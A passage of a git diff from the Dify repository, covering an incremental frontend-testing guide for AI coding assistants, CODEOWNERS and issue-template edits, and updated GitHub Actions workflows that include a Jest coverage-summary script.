+ +| Batch Approach (❌) | Incremental Approach (✅) | +|---------------------|---------------------------| +| Generate 5+ tests at once | Generate 1 test at a time | +| Run tests only at the end | Run test immediately after each file | +| Multiple failures compound | Single point of failure, easy to debug | +| Hard to identify root cause | Clear cause-effect relationship | +| Mock issues affect many files | Mock issues caught early | +| Messy git history | Clean, atomic commits possible | + +## Single File Workflow + +When testing a **single component, hook, or utility**: + +``` +1. Read source code completely +2. Run `pnpm analyze-component ` (if available) +3. Check complexity score and features detected +4. Write the test file +5. Run test: `pnpm test -- .spec.tsx` +6. Fix any failures +7. Verify coverage meets goals (100% function, >95% branch) +``` + +## Directory/Multi-File Workflow (MUST FOLLOW) + +When testing a **directory or multiple files**, follow this strict workflow: + +### Step 1: Analyze and Plan + +1. **List all files** that need tests in the directory +1. **Categorize by complexity**: + - 🟢 **Simple**: Utility functions, simple hooks, presentational components + - 🟡 **Medium**: Components with state, effects, or event handlers + - 🔴 **Complex**: Components with API calls, routing, or many dependencies +1. **Order by dependency**: Test dependencies before dependents +1. **Create a todo list** to track progress + +### Step 2: Determine Processing Order + +Process files in this recommended order: + +``` +1. Utility functions (simplest, no React) +2. Custom hooks (isolated logic) +3. Simple presentational components (few/no props) +4. Medium complexity components (state, effects) +5. Complex components (API, routing, many deps) +6. Container/index components (integration tests - last) +``` + +**Rationale**: + +- Simpler files help establish mock patterns +- Hooks used by components should be tested first +- Integration tests (index files) depend on child components working + +### Step 3: Process Each File Incrementally + +**For EACH file in the ordered list:** + +``` +┌─────────────────────────────────────────────┐ +│ 1. Write test file │ +│ 2. Run: pnpm test -- .spec.tsx │ +│ 3. If FAIL → Fix immediately, re-run │ +│ 4. If PASS → Mark complete in todo list │ +│ 5. ONLY THEN proceed to next file │ +└─────────────────────────────────────────────┘ +``` + +**DO NOT proceed to the next file until the current one passes.** + +### Step 4: Final Verification + +After all individual tests pass: + +```bash +# Run all tests in the directory together +pnpm test -- path/to/directory/ + +# Check coverage +pnpm test -- --coverage path/to/directory/ +``` + +## Component Complexity Guidelines + +Use `pnpm analyze-component ` to assess complexity before testing. 
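+For example, pass the component path (the path below is illustrative; the `--review` flag follows the Quick Reference usage in SKILL.md):
+
+```bash
+# Assess complexity before writing the spec
+pnpm analyze-component app/components/base/button/index.tsx
+
+# Review an existing spec for the same component
+pnpm analyze-component app/components/base/button/index.tsx --review
+```
+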
+ +### 🔴 Very Complex Components (Complexity > 50) + +**Consider refactoring BEFORE testing:** + +- Break component into smaller, testable pieces +- Extract complex logic into custom hooks +- Separate container and presentational layers + +**If testing as-is:** + +- Use integration tests for complex workflows +- Use `test.each()` for data-driven testing +- Multiple `describe` blocks for organization +- Consider testing major sections separately + +### 🟡 Medium Complexity (Complexity 30-50) + +- Group related tests in `describe` blocks +- Test integration scenarios between internal parts +- Focus on state transitions and side effects +- Use helper functions to reduce test complexity + +### 🟢 Simple Components (Complexity < 30) + +- Standard test structure +- Focus on props, rendering, and edge cases +- Usually straightforward to test + +### 📏 Large Files (500+ lines) + +Regardless of complexity score: + +- **Strongly consider refactoring** before testing +- If testing as-is, test major sections separately +- Create helper functions for test setup +- May need multiple test files + +## Todo List Format + +When testing multiple files, use a todo list like this: + +``` +Testing: path/to/directory/ + +Ordered by complexity (simple → complex): + +☐ utils/helper.ts [utility, simple] +☐ hooks/use-custom-hook.ts [hook, simple] +☐ empty-state.tsx [component, simple] +☐ item-card.tsx [component, medium] +☐ list.tsx [component, complex] +☐ index.tsx [integration] + +Progress: 0/6 complete +``` + +Update status as you complete each: + +- ☐ → ⏳ (in progress) +- ⏳ → ✅ (complete and verified) +- ⏳ → ❌ (blocked, needs attention) + +## When to Stop and Verify + +**Always run tests after:** + +- Completing a test file +- Making changes to fix a failure +- Modifying shared mocks +- Updating test utilities or helpers + +**Signs you should pause:** + +- More than 2 consecutive test failures +- Mock-related errors appearing +- Unclear why a test is failing +- Test passing but coverage unexpectedly low + +## Common Pitfalls to Avoid + +### ❌ Don't: Generate Everything First + +``` +# BAD: Writing all files then testing +Write component-a.spec.tsx +Write component-b.spec.tsx +Write component-c.spec.tsx +Write component-d.spec.tsx +Run pnpm test ← Multiple failures, hard to debug +``` + +### ✅ Do: Verify Each Step + +``` +# GOOD: Incremental with verification +Write component-a.spec.tsx +Run pnpm test -- component-a.spec.tsx ✅ +Write component-b.spec.tsx +Run pnpm test -- component-b.spec.tsx ✅ +...continue... +``` + +### ❌ Don't: Skip Verification for "Simple" Components + +Even simple components can have: + +- Import errors +- Missing mock setup +- Incorrect assumptions about props + +**Always verify, regardless of perceived simplicity.** + +### ❌ Don't: Continue When Tests Fail + +Failing tests compound: + +- A mock issue in file A affects files B, C, D +- Fixing A later requires revisiting all dependent tests +- Time wasted on debugging cascading failures + +**Fix failures immediately before proceeding.** + +## Integration with Claude's Todo Feature + +When using Claude for multi-file testing: + +1. **Ask Claude to create a todo list** before starting +1. **Request one file at a time** or ensure Claude processes incrementally +1. **Verify each test passes** before asking for the next +1. **Mark todos complete** as you progress + +Example prompt: + +``` +Test all components in `path/to/directory/`. +First, analyze the directory and create a todo list ordered by complexity. 
+Then, process ONE file at a time, waiting for my confirmation that tests pass +before proceeding to the next. +``` + +## Summary Checklist + +Before starting multi-file testing: + +- [ ] Listed all files needing tests +- [ ] Ordered by complexity (simple → complex) +- [ ] Created todo list for tracking +- [ ] Understand dependencies between files + +During testing: + +- [ ] Processing ONE file at a time +- [ ] Running tests after EACH file +- [ ] Fixing failures BEFORE proceeding +- [ ] Updating todo list progress + +After completion: + +- [ ] All individual tests pass +- [ ] Full directory test run passes +- [ ] Coverage goals met +- [ ] Todo list shows all complete diff --git a/.codex/skills b/.codex/skills new file mode 120000 index 0000000000..454b8427cd --- /dev/null +++ b/.codex/skills @@ -0,0 +1 @@ +../.claude/skills \ No newline at end of file diff --git a/.coveragerc b/.coveragerc new file mode 100644 index 0000000000..190c0c185b --- /dev/null +++ b/.coveragerc @@ -0,0 +1,5 @@ +[run] +omit = + api/tests/* + api/migrations/* + api/core/rag/datasource/vdb/* diff --git a/.devcontainer/post_create_command.sh b/.devcontainer/post_create_command.sh index a26fd076ed..ce9135476f 100755 --- a/.devcontainer/post_create_command.sh +++ b/.devcontainer/post_create_command.sh @@ -6,7 +6,7 @@ cd web && pnpm install pipx install uv echo "alias start-api=\"cd $WORKSPACE_ROOT/api && uv run python -m flask run --host 0.0.0.0 --port=5001 --debug\"" >> ~/.bashrc -echo "alias start-worker=\"cd $WORKSPACE_ROOT/api && uv run python -m celery -A app.celery worker -P threads -c 1 --loglevel INFO -Q dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor\"" >> ~/.bashrc +echo "alias start-worker=\"cd $WORKSPACE_ROOT/api && uv run python -m celery -A app.celery worker -P threads -c 1 --loglevel INFO -Q dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor,retention\"" >> ~/.bashrc echo "alias start-web=\"cd $WORKSPACE_ROOT/web && pnpm dev\"" >> ~/.bashrc echo "alias start-web-prod=\"cd $WORKSPACE_ROOT/web && pnpm build && pnpm start\"" >> ~/.bashrc echo "alias start-containers=\"cd $WORKSPACE_ROOT/docker && docker-compose -f docker-compose.middleware.yaml -p dify --env-file middleware.env up -d\"" >> ~/.bashrc diff --git a/.github/CODEOWNERS b/.github/CODEOWNERS index 94e5b0f969..4bc4f085c2 100644 --- a/.github/CODEOWNERS +++ b/.github/CODEOWNERS @@ -6,9 +6,23 @@ * @crazywoola @laipz8200 @Yeuoly +# CODEOWNERS file +.github/CODEOWNERS @laipz8200 @crazywoola + +# Docs +docs/ @crazywoola + # Backend (default owner, more specific rules below will override) api/ @QuantumGhost +# Backend - MCP +api/core/mcp/ @Nov1c444 +api/core/entities/mcp_provider.py @Nov1c444 +api/services/tools/mcp_tools_manage_service.py @Nov1c444 +api/controllers/mcp/ @Nov1c444 +api/controllers/console/app/mcp_server.py @Nov1c444 +api/tests/**/*mcp* @Nov1c444 + # Backend - Workflow - Engine (Core graph execution engine) api/core/workflow/graph_engine/ @laipz8200 @QuantumGhost api/core/workflow/runtime/ @laipz8200 @QuantumGhost @@ -108,11 +122,17 @@ api/controllers/console/feature.py @GarfieldDai @GareArc api/controllers/web/feature.py @GarfieldDai @GareArc # Backend - Database Migrations -api/migrations/ @snakevash @laipz8200 
+api/migrations/ @snakevash @laipz8200 @MRZHUH + +# Backend - Vector DB Middleware +api/configs/middleware/vdb/* @JohnJyong # Frontend web/ @iamjoel +# Frontend - Web Tests +.github/workflows/web-tests.yml @iamjoel + # Frontend - App - Orchestration web/app/components/workflow/ @iamjoel @zxhlyh web/app/components/workflow-app/ @iamjoel @zxhlyh @@ -184,6 +204,7 @@ web/app/components/plugins/marketplace/ @iamjoel @Yessenia-d web/app/signin/ @douxc @iamjoel web/app/signup/ @douxc @iamjoel web/app/reset-password/ @douxc @iamjoel + web/app/install/ @douxc @iamjoel web/app/init/ @douxc @iamjoel web/app/forgot-password/ @douxc @iamjoel @@ -224,3 +245,6 @@ web/app/education-apply/ @iamjoel @zxhlyh # Frontend - Workspace web/app/components/header/account-dropdown/workplace-selector/ @iamjoel @zxhlyh + +# Docker +docker/* @laipz8200 diff --git a/.github/ISSUE_TEMPLATE/refactor.yml b/.github/ISSUE_TEMPLATE/refactor.yml index cf74dcc546..dbe8cbb602 100644 --- a/.github/ISSUE_TEMPLATE/refactor.yml +++ b/.github/ISSUE_TEMPLATE/refactor.yml @@ -1,8 +1,6 @@ -name: "✨ Refactor" -description: Refactor existing code for improved readability and maintainability. -title: "[Chore/Refactor] " -labels: - - refactor +name: "✨ Refactor or Chore" +description: Refactor existing code or perform maintenance chores to improve readability and reliability. +title: "[Refactor/Chore] " body: - type: checkboxes attributes: @@ -11,7 +9,7 @@ body: options: - label: I have read the [Contributing Guide](https://github.com/langgenius/dify/blob/main/CONTRIBUTING.md) and [Language Policy](https://github.com/langgenius/dify/issues/1542). required: true - - label: This is only for refactoring, if you would like to ask a question, please head to [Discussions](https://github.com/langgenius/dify/discussions/categories/general). + - label: This is only for refactors or chores; if you would like to ask a question, please head to [Discussions](https://github.com/langgenius/dify/discussions/categories/general). required: true - label: I have searched for existing issues [search for existing issues](https://github.com/langgenius/dify/issues), including closed ones. required: true @@ -25,14 +23,14 @@ body: id: description attributes: label: Description - placeholder: "Describe the refactor you are proposing." + placeholder: "Describe the refactor or chore you are proposing." validations: required: true - type: textarea id: motivation attributes: label: Motivation - placeholder: "Explain why this refactor is necessary." + placeholder: "Explain why this refactor or chore is necessary." validations: required: false - type: textarea diff --git a/.github/ISSUE_TEMPLATE/tracker.yml b/.github/ISSUE_TEMPLATE/tracker.yml deleted file mode 100644 index 35fedefc75..0000000000 --- a/.github/ISSUE_TEMPLATE/tracker.yml +++ /dev/null @@ -1,13 +0,0 @@ -name: "👾 Tracker" -description: For inner usages, please do not use this template. -title: "[Tracker] " -labels: - - tracker -body: - - type: textarea - id: content - attributes: - label: Blockers - placeholder: "- [ ] ..." - validations: - required: true diff --git a/.github/copilot-instructions.md b/.github/copilot-instructions.md deleted file mode 100644 index 53afcbda1e..0000000000 --- a/.github/copilot-instructions.md +++ /dev/null @@ -1,12 +0,0 @@ -# Copilot Instructions - -GitHub Copilot must follow the unified frontend testing requirements documented in `web/testing/testing.md`. 
- -Key reminders: - -- Generate tests using the mandated tech stack, naming, and code style (AAA pattern, `fireEvent`, descriptive test names, cleans up mocks). -- Cover rendering, prop combinations, and edge cases by default; extend coverage for hooks, routing, async flows, and domain-specific components when applicable. -- Target >95% line and branch coverage and 100% function/statement coverage. -- Apply the project's mocking conventions for i18n, toast notifications, and Next.js utilities. - -Any suggestions from Copilot that conflict with `web/testing/testing.md` should be revised before acceptance. diff --git a/.github/workflows/api-tests.yml b/.github/workflows/api-tests.yml index 557d747a8c..76cbf64fca 100644 --- a/.github/workflows/api-tests.yml +++ b/.github/workflows/api-tests.yml @@ -71,18 +71,18 @@ jobs: run: | cp api/tests/integration_tests/.env.example api/tests/integration_tests/.env - - name: Run Workflow - run: uv run --project api bash dev/pytest/pytest_workflow.sh - - - name: Run Tool - run: uv run --project api bash dev/pytest/pytest_tools.sh - - - name: Run TestContainers - run: uv run --project api bash dev/pytest/pytest_testcontainers.sh - - - name: Run Unit tests + - name: Run API Tests + env: + STORAGE_TYPE: opendal + OPENDAL_SCHEME: fs + OPENDAL_FS_ROOT: /tmp/dify-storage run: | - uv run --project api bash dev/pytest/pytest_unit_tests.sh + uv run --project api pytest \ + --timeout "${PYTEST_TIMEOUT:-180}" \ + api/tests/integration_tests/workflow \ + api/tests/integration_tests/tools \ + api/tests/test_containers_integration_tests \ + api/tests/unit_tests - name: Coverage Summary run: | @@ -93,5 +93,12 @@ jobs: # Create a detailed coverage summary echo "### Test Coverage Summary :test_tube:" >> $GITHUB_STEP_SUMMARY echo "Total Coverage: ${TOTAL_COVERAGE}%" >> $GITHUB_STEP_SUMMARY - uv run --project api coverage report --format=markdown >> $GITHUB_STEP_SUMMARY - + { + echo "" + echo "
<details>" + echo "<summary>File-level coverage (click to expand)</summary>" + echo "" + echo '```' + uv run --project api coverage report -m + echo '```' + echo "</details>
" + } >> $GITHUB_STEP_SUMMARY diff --git a/.github/workflows/autofix.yml b/.github/workflows/autofix.yml index 81392a9734..bafac7bd13 100644 --- a/.github/workflows/autofix.yml +++ b/.github/workflows/autofix.yml @@ -13,11 +13,12 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 - - # Use uv to ensure we have the same ruff version in CI and locally. - - uses: astral-sh/setup-uv@v6 + - uses: actions/setup-python@v5 with: python-version: "3.11" + + - uses: astral-sh/setup-uv@v6 + - run: | cd api uv sync --dev @@ -35,10 +36,11 @@ jobs: - name: ast-grep run: | - uvx --from ast-grep-cli sg --pattern 'db.session.query($WHATEVER).filter($HERE)' --rewrite 'db.session.query($WHATEVER).where($HERE)' -l py --update-all - uvx --from ast-grep-cli sg --pattern 'session.query($WHATEVER).filter($HERE)' --rewrite 'session.query($WHATEVER).where($HERE)' -l py --update-all - uvx --from ast-grep-cli sg -p '$A = db.Column($$$B)' -r '$A = mapped_column($$$B)' -l py --update-all - uvx --from ast-grep-cli sg -p '$A : $T = db.Column($$$B)' -r '$A : $T = mapped_column($$$B)' -l py --update-all + # ast-grep exits 1 if no matches are found; allow idempotent runs. + uvx --from ast-grep-cli ast-grep --pattern 'db.session.query($WHATEVER).filter($HERE)' --rewrite 'db.session.query($WHATEVER).where($HERE)' -l py --update-all || true + uvx --from ast-grep-cli ast-grep --pattern 'session.query($WHATEVER).filter($HERE)' --rewrite 'session.query($WHATEVER).where($HERE)' -l py --update-all || true + uvx --from ast-grep-cli ast-grep -p '$A = db.Column($$$B)' -r '$A = mapped_column($$$B)' -l py --update-all || true + uvx --from ast-grep-cli ast-grep -p '$A : $T = db.Column($$$B)' -r '$A : $T = mapped_column($$$B)' -l py --update-all || true # Convert Optional[T] to T | None (ignoring quoted types) cat > /tmp/optional-rule.yml << 'EOF' id: convert-optional-to-union @@ -56,14 +58,15 @@ jobs: pattern: $T fix: $T | None EOF - uvx --from ast-grep-cli sg scan --inline-rules "$(cat /tmp/optional-rule.yml)" --update-all + uvx --from ast-grep-cli ast-grep scan . --inline-rules "$(cat /tmp/optional-rule.yml)" --update-all # Fix forward references that were incorrectly converted (Python doesn't support "Type" | None syntax) find . -name "*.py" -type f -exec sed -i.bak -E 's/"([^"]+)" \| None/Optional["\1"]/g; s/'"'"'([^'"'"']+)'"'"' \| None/Optional['"'"'\1'"'"']/g' {} \; find . -name "*.py.bak" -type f -delete + # mdformat breaks YAML front matter in markdown files. Add --exclude for directories containing YAML front matter. - name: mdformat run: | - uvx mdformat . + uvx --python 3.13 mdformat . --exclude ".claude/skills/**/SKILL.md" - name: Install pnpm uses: pnpm/action-setup@v4 @@ -76,7 +79,7 @@ jobs: with: node-version: 22 cache: pnpm - cache-dependency-path: ./web/package.json + cache-dependency-path: ./web/pnpm-lock.yaml - name: Web dependencies working-directory: ./web @@ -84,7 +87,6 @@ jobs: - name: oxlint working-directory: ./web - run: | - pnpx oxlint --fix + run: pnpm exec oxlint --config .oxlintrc.json --fix . 
- uses: autofix-ci/action@635ffb0c9798bd160680f18fd73371e355b85f27 diff --git a/.github/workflows/semantic-pull-request.yml b/.github/workflows/semantic-pull-request.yml new file mode 100644 index 0000000000..b15c26a096 --- /dev/null +++ b/.github/workflows/semantic-pull-request.yml @@ -0,0 +1,21 @@ +name: Semantic Pull Request + +on: + pull_request: + types: + - opened + - edited + - reopened + - synchronize + +jobs: + lint: + name: Validate PR title + permissions: + pull-requests: read + runs-on: ubuntu-latest + steps: + - name: Check title + uses: amannn/action-semantic-pull-request@v6.1.1 + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} diff --git a/.github/workflows/style.yml b/.github/workflows/style.yml index 5a8a34be79..2fb8121f74 100644 --- a/.github/workflows/style.yml +++ b/.github/workflows/style.yml @@ -90,7 +90,7 @@ jobs: with: node-version: 22 cache: pnpm - cache-dependency-path: ./web/package.json + cache-dependency-path: ./web/pnpm-lock.yaml - name: Web dependencies if: steps.changed-files.outputs.any_changed == 'true' diff --git a/.github/workflows/translate-i18n-base-on-english.yml b/.github/workflows/translate-i18n-base-on-english.yml index fe8e2ebc2b..8bb82d5d44 100644 --- a/.github/workflows/translate-i18n-base-on-english.yml +++ b/.github/workflows/translate-i18n-base-on-english.yml @@ -55,7 +55,7 @@ jobs: with: node-version: 'lts/*' cache: pnpm - cache-dependency-path: ./web/package.json + cache-dependency-path: ./web/pnpm-lock.yaml - name: Install dependencies if: env.FILES_CHANGED == 'true' diff --git a/.github/workflows/web-tests.yml b/.github/workflows/web-tests.yml index 3313e58614..b1f32f96c2 100644 --- a/.github/workflows/web-tests.yml +++ b/.github/workflows/web-tests.yml @@ -13,6 +13,7 @@ jobs: runs-on: ubuntu-latest defaults: run: + shell: bash working-directory: ./web steps: @@ -21,14 +22,7 @@ jobs: with: persist-credentials: false - - name: Check changed files - id: changed-files - uses: tj-actions/changed-files@v46 - with: - files: web/** - - name: Install pnpm - if: steps.changed-files.outputs.any_changed == 'true' uses: pnpm/action-setup@v4 with: package_json_file: web/package.json @@ -36,23 +30,355 @@ jobs: - name: Setup Node.js uses: actions/setup-node@v4 - if: steps.changed-files.outputs.any_changed == 'true' with: node-version: 22 cache: pnpm - cache-dependency-path: ./web/package.json + cache-dependency-path: ./web/pnpm-lock.yaml + + - name: Restore Jest cache + uses: actions/cache@v4 + with: + path: web/.cache/jest + key: ${{ runner.os }}-jest-${{ hashFiles('web/pnpm-lock.yaml') }} + restore-keys: | + ${{ runner.os }}-jest- - name: Install dependencies - if: steps.changed-files.outputs.any_changed == 'true' - working-directory: ./web run: pnpm install --frozen-lockfile - name: Check i18n types synchronization - if: steps.changed-files.outputs.any_changed == 'true' - working-directory: ./web run: pnpm run check:i18n-types - name: Run tests - if: steps.changed-files.outputs.any_changed == 'true' - working-directory: ./web - run: pnpm test + run: | + pnpm exec jest \ + --ci \ + --maxWorkers=100% \ + --coverage \ + --passWithNoTests + + - name: Coverage Summary + if: always() + id: coverage-summary + run: | + set -eo pipefail + + COVERAGE_FILE="coverage/coverage-final.json" + COVERAGE_SUMMARY_FILE="coverage/coverage-summary.json" + + if [ ! -f "$COVERAGE_FILE" ] && [ ! 
-f "$COVERAGE_SUMMARY_FILE" ]; then + echo "has_coverage=false" >> "$GITHUB_OUTPUT" + echo "### 🚨 Test Coverage Report :test_tube:" >> "$GITHUB_STEP_SUMMARY" + echo "Coverage data not found. Ensure Jest runs with coverage enabled." >> "$GITHUB_STEP_SUMMARY" + exit 0 + fi + + echo "has_coverage=true" >> "$GITHUB_OUTPUT" + + node <<'NODE' >> "$GITHUB_STEP_SUMMARY" + const fs = require('fs'); + const path = require('path'); + let libCoverage = null; + + try { + libCoverage = require('istanbul-lib-coverage'); + } catch (error) { + libCoverage = null; + } + + const summaryPath = path.join('coverage', 'coverage-summary.json'); + const finalPath = path.join('coverage', 'coverage-final.json'); + + const hasSummary = fs.existsSync(summaryPath); + const hasFinal = fs.existsSync(finalPath); + + if (!hasSummary && !hasFinal) { + console.log('### Test Coverage Summary :test_tube:'); + console.log(''); + console.log('No coverage data found.'); + process.exit(0); + } + + const summary = hasSummary + ? JSON.parse(fs.readFileSync(summaryPath, 'utf8')) + : null; + const coverage = hasFinal + ? JSON.parse(fs.readFileSync(finalPath, 'utf8')) + : null; + + const getLineCoverageFromStatements = (statementMap, statementHits) => { + const lineHits = {}; + + if (!statementMap || !statementHits) { + return lineHits; + } + + Object.entries(statementMap).forEach(([key, statement]) => { + const line = statement?.start?.line; + if (!line) { + return; + } + const hits = statementHits[key] ?? 0; + const previous = lineHits[line]; + lineHits[line] = previous === undefined ? hits : Math.max(previous, hits); + }); + + return lineHits; + }; + + const getFileCoverage = (entry) => ( + libCoverage ? libCoverage.createFileCoverage(entry) : null + ); + + const getLineHits = (entry, fileCoverage) => { + const lineHits = entry.l ?? {}; + if (Object.keys(lineHits).length > 0) { + return lineHits; + } + if (fileCoverage) { + return fileCoverage.getLineCoverage(); + } + return getLineCoverageFromStatements(entry.statementMap ?? {}, entry.s ?? {}); + }; + + const getUncoveredLines = (entry, fileCoverage, lineHits) => { + if (lineHits && Object.keys(lineHits).length > 0) { + return Object.entries(lineHits) + .filter(([, count]) => count === 0) + .map(([line]) => Number(line)) + .sort((a, b) => a - b); + } + if (fileCoverage) { + return fileCoverage.getUncoveredLines(); + } + return []; + }; + + const totals = { + lines: { covered: 0, total: 0 }, + statements: { covered: 0, total: 0 }, + branches: { covered: 0, total: 0 }, + functions: { covered: 0, total: 0 }, + }; + const fileSummaries = []; + + if (summary) { + const totalEntry = summary.total ?? {}; + ['lines', 'statements', 'branches', 'functions'].forEach((key) => { + if (totalEntry[key]) { + totals[key].covered = totalEntry[key].covered ?? 0; + totals[key].total = totalEntry[key].total ?? 0; + } + }); + + Object.entries(summary) + .filter(([file]) => file !== 'total') + .forEach(([file, data]) => { + fileSummaries.push({ + file, + pct: data.lines?.pct ?? data.statements?.pct ?? 0, + lines: { + covered: data.lines?.covered ?? 0, + total: data.lines?.total ?? 0, + }, + }); + }); + } else if (coverage) { + Object.entries(coverage).forEach(([file, entry]) => { + const fileCoverage = getFileCoverage(entry); + const lineHits = getLineHits(entry, fileCoverage); + const statementHits = entry.s ?? {}; + const branchHits = entry.b ?? {}; + const functionHits = entry.f ?? 
{}; + + const lineTotal = Object.keys(lineHits).length; + const lineCovered = Object.values(lineHits).filter((n) => n > 0).length; + + const statementTotal = Object.keys(statementHits).length; + const statementCovered = Object.values(statementHits).filter((n) => n > 0).length; + + const branchTotal = Object.values(branchHits).reduce((acc, branches) => acc + branches.length, 0); + const branchCovered = Object.values(branchHits).reduce( + (acc, branches) => acc + branches.filter((n) => n > 0).length, + 0, + ); + + const functionTotal = Object.keys(functionHits).length; + const functionCovered = Object.values(functionHits).filter((n) => n > 0).length; + + totals.lines.total += lineTotal; + totals.lines.covered += lineCovered; + totals.statements.total += statementTotal; + totals.statements.covered += statementCovered; + totals.branches.total += branchTotal; + totals.branches.covered += branchCovered; + totals.functions.total += functionTotal; + totals.functions.covered += functionCovered; + + const pct = (covered, tot) => (tot > 0 ? (covered / tot) * 100 : 0); + + fileSummaries.push({ + file, + pct: pct(lineCovered || statementCovered, lineTotal || statementTotal), + lines: { + covered: lineCovered || statementCovered, + total: lineTotal || statementTotal, + }, + }); + }); + } + + const pct = (covered, tot) => (tot > 0 ? ((covered / tot) * 100).toFixed(2) : '0.00'); + + console.log('### Test Coverage Summary :test_tube:'); + console.log(''); + console.log('| Metric | Coverage | Covered / Total |'); + console.log('|--------|----------|-----------------|'); + console.log(`| Lines | ${pct(totals.lines.covered, totals.lines.total)}% | ${totals.lines.covered} / ${totals.lines.total} |`); + console.log(`| Statements | ${pct(totals.statements.covered, totals.statements.total)}% | ${totals.statements.covered} / ${totals.statements.total} |`); + console.log(`| Branches | ${pct(totals.branches.covered, totals.branches.total)}% | ${totals.branches.covered} / ${totals.branches.total} |`); + console.log(`| Functions | ${pct(totals.functions.covered, totals.functions.total)}% | ${totals.functions.covered} / ${totals.functions.total} |`); + + console.log(''); + console.log('
<details><summary>File coverage (lowest lines first)</summary>');
+      console.log('');
+      console.log('```');
+      fileSummaries
+        .sort((a, b) => (a.pct - b.pct) || (b.lines.total - a.lines.total))
+        .slice(0, 25)
+        .forEach(({ file, pct, lines }) => {
+          console.log(`${pct.toFixed(2)}%\t${lines.covered}/${lines.total}\t${file}`);
+        });
+      console.log('```');
+      console.log('</details>
'); + + if (coverage) { + const pctValue = (covered, tot) => { + if (tot === 0) { + return '0'; + } + return ((covered / tot) * 100) + .toFixed(2) + .replace(/\.?0+$/, ''); + }; + + const formatLineRanges = (lines) => { + if (lines.length === 0) { + return ''; + } + const ranges = []; + let start = lines[0]; + let end = lines[0]; + + for (let i = 1; i < lines.length; i += 1) { + const current = lines[i]; + if (current === end + 1) { + end = current; + continue; + } + ranges.push(start === end ? `${start}` : `${start}-${end}`); + start = current; + end = current; + } + ranges.push(start === end ? `${start}` : `${start}-${end}`); + return ranges.join(','); + }; + + const tableTotals = { + statements: { covered: 0, total: 0 }, + branches: { covered: 0, total: 0 }, + functions: { covered: 0, total: 0 }, + lines: { covered: 0, total: 0 }, + }; + const tableRows = Object.entries(coverage) + .map(([file, entry]) => { + const fileCoverage = getFileCoverage(entry); + const lineHits = getLineHits(entry, fileCoverage); + const statementHits = entry.s ?? {}; + const branchHits = entry.b ?? {}; + const functionHits = entry.f ?? {}; + + const lineTotal = Object.keys(lineHits).length; + const lineCovered = Object.values(lineHits).filter((n) => n > 0).length; + const statementTotal = Object.keys(statementHits).length; + const statementCovered = Object.values(statementHits).filter((n) => n > 0).length; + const branchTotal = Object.values(branchHits).reduce((acc, branches) => acc + branches.length, 0); + const branchCovered = Object.values(branchHits).reduce( + (acc, branches) => acc + branches.filter((n) => n > 0).length, + 0, + ); + const functionTotal = Object.keys(functionHits).length; + const functionCovered = Object.values(functionHits).filter((n) => n > 0).length; + + tableTotals.lines.total += lineTotal; + tableTotals.lines.covered += lineCovered; + tableTotals.statements.total += statementTotal; + tableTotals.statements.covered += statementCovered; + tableTotals.branches.total += branchTotal; + tableTotals.branches.covered += branchCovered; + tableTotals.functions.total += functionTotal; + tableTotals.functions.covered += functionCovered; + + const uncoveredLines = getUncoveredLines(entry, fileCoverage, lineHits); + + const filePath = entry.path ?? file; + const relativePath = path.isAbsolute(filePath) + ? 
path.relative(process.cwd(), filePath) + : filePath; + + return { + file: relativePath || file, + statements: pctValue(statementCovered, statementTotal), + branches: pctValue(branchCovered, branchTotal), + functions: pctValue(functionCovered, functionTotal), + lines: pctValue(lineCovered, lineTotal), + uncovered: formatLineRanges(uncoveredLines), + }; + }) + .sort((a, b) => a.file.localeCompare(b.file)); + + const columns = [ + { key: 'file', header: 'File', align: 'left' }, + { key: 'statements', header: '% Stmts', align: 'right' }, + { key: 'branches', header: '% Branch', align: 'right' }, + { key: 'functions', header: '% Funcs', align: 'right' }, + { key: 'lines', header: '% Lines', align: 'right' }, + { key: 'uncovered', header: 'Uncovered Line #s', align: 'left' }, + ]; + + const allFilesRow = { + file: 'All files', + statements: pctValue(tableTotals.statements.covered, tableTotals.statements.total), + branches: pctValue(tableTotals.branches.covered, tableTotals.branches.total), + functions: pctValue(tableTotals.functions.covered, tableTotals.functions.total), + lines: pctValue(tableTotals.lines.covered, tableTotals.lines.total), + uncovered: '', + }; + + const rowsForOutput = [allFilesRow, ...tableRows]; + const formatRow = (row) => `| ${columns + .map(({ key }) => String(row[key] ?? '')) + .join(' | ')} |`; + const headerRow = `| ${columns.map(({ header }) => header).join(' | ')} |`; + const dividerRow = `| ${columns + .map(({ align }) => (align === 'right' ? '---:' : ':---')) + .join(' | ')} |`; + + console.log(''); + console.log('
<details><summary>Jest coverage table</summary>');
+          console.log('');
+          console.log(headerRow);
+          console.log(dividerRow);
+          rowsForOutput.forEach((row) => console.log(formatRow(row)));
+          console.log('</details>
'); + } + NODE + + - name: Upload Coverage Artifact + if: steps.coverage-summary.outputs.has_coverage == 'true' + uses: actions/upload-artifact@v4 + with: + name: web-coverage-report + path: web/coverage + retention-days: 30 + if-no-files-found: error diff --git a/.gitignore b/.gitignore index 79ba44b207..5ad728c3da 100644 --- a/.gitignore +++ b/.gitignore @@ -189,6 +189,7 @@ docker/volumes/matrixone/* docker/volumes/mysql/* docker/volumes/seekdb/* !docker/volumes/oceanbase/init.d +docker/volumes/iris/* docker/nginx/conf.d/default.conf docker/nginx/ssl/* diff --git a/.nvmrc b/.nvmrc new file mode 100644 index 0000000000..7af24b7ddb --- /dev/null +++ b/.nvmrc @@ -0,0 +1 @@ +22.11.0 diff --git a/.vscode/launch.json.template b/.vscode/launch.json.template index cb934d01b5..bdded1e73e 100644 --- a/.vscode/launch.json.template +++ b/.vscode/launch.json.template @@ -37,7 +37,7 @@ "-c", "1", "-Q", - "dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor", + "dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor,retention", "--loglevel", "INFO" ], diff --git a/.windsurf/rules/testing.md b/.windsurf/rules/testing.md 